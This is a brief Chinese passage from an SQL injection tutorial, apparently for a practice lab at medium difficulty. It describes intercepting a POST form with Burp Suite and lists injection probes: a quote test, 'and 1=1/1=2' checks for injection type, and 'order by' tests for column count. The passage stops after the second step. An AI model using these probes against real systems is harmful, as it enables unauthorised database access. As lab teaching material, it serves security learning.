medium级别(手工注入 和 sqlmap工具注入)
手工注入
因为该级别设置了下拉菜单,提交后URL中没有显示ID,提交方式为POST,所以用burpsuite抓包,更改参数。
1.判断是否存在注入,注入的类型是字符型还是数字型
id=1&Submit=Submit

id=1’ &Submit=Submit

id=1 and 1=1&Submit=Submit

id=1 and 1=2&Submit=Submit

2.猜测字段数
id=1 order by 3&Submit=Submit
id=1 order by 2&Submit=Submit